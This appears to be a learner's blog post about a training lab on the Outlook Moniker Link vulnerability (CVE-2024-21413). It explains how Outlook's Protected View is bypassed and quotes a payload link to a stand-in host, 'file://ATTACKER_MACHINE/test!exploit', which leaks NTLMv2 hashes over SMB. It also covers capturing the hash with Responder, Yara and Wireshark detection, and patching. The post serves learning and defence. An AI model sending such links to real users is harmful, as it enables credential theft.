I’ve recently begun exploring Exploitation Basics, within the Cyber security 101 path. Moniker Links was the first exploit discussed, which has the ability to pass Outlook’s security system when given a certain type of hyperlink, The Moniker link. I can abuse this by sending an email containing the malicious link to the victim. Successfully doing this commands Outlook to send the victim’s NTLM credentials once the hyperlink is clicked.

So how does this vulnerability work? Well, most of the time the mail software will prompt a security warning when one attempts to open external applications. Personally, I’ve come across this prompt one too many times, which I always found tedious unnecessary, but there’s a crucial reason for this. On February 13th 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link), what is RCE? RCE stands for “Remote Code Execution”, a vulnerability that allows a hacker to run any code on a remote system.

When successful this can lead to a complete compromise of the target system. Russian hackers, known as the bears famously used an exploit similar to this one, by sending a hyperlink to one of the staff members under the German government. This successful exploit allowed the hackers to gain full access to the German parliament’s private emails and documents. As this caught my attention in a very exuberant way(In terms of how they were able to exploit the system), I know the consequences of such actions are severe, and I do value my freedom! So I’ll quickly mention, how I’ll continue to be a law abiding citizen XD!!

As previously stated, Outlook will initiate a pop-up as a result of Outlook’s “Protected-View”. Which opens an email with any attachment or link under read-only mode blocking things coming from entities outside the organisation. These things are in place to avoid malicious entities from accessing our information, BUT!… By using the “file://” moniker link within our hyperlink, we can demand Outlook to attempt to access a file. Such as a file on a network share. The “Server Message Block” protocol (SMB, A file, folder, or device on a computer used to communicate with other computers on the same network ) is used where local credentials are involved. Though this is easily blocked due to Outlook’s Protected-View, which catches and blocks the attempt.

The vulnerability occurs with a simple addition to one’s hyperlink. To include the “!” special character and some text to one’s moniker link, bypassing Outlook’s Protected-View. The attacker can provide a Moniker Link such as this one “<p><a “href=”file://ATTACKER_MACHINE/test!exploit”“>Click me</a></p>”. “file://” tells Outlook to access a file, “attacker_machine” your server, and “!exploit” being the bypass trick for the attack. Keep in mind one doesn’t have to have the share file on the remote device. Authentication will be attempted regardless, leading to our victim’s new NTLMv2 hash, being sent to us, which is used to verify a user’s identity over a network, without having to view their password via plain-text.

I completed a simple exploitation task within an Attackbox. The objective was create a Moniker link for the victim to bypass their Protected-View security mechanism. Where the victim will try to load a file from my attacking machine, resulting in me acquiring their NTLMv2 Hash :). With the use of the Proof of concept provided to me, and using a responder, initiating an SMB listener on my attacking machine, the victim’s netNTLMv2 was captured on my attackbox!

In ways to detect exploits like this one, Florian Roth created Yara to detect emails containing the “file://” element in Moniker links. The packet analyser, Wireshark. In addition the SMB request from the victim to the client can be seen within a packet capture with a truncated netNTLMv2 hash.

Microsoft have released patches in order to terminate such vulnerabilities within their software, but it’s highly recommended for one to follow cyber-security precautions. Such as, Not clicking random links, reviewing links before clicking them, and delegating malicious links to the appropriate department responsible for cyber-security(MEEEEEE!!!).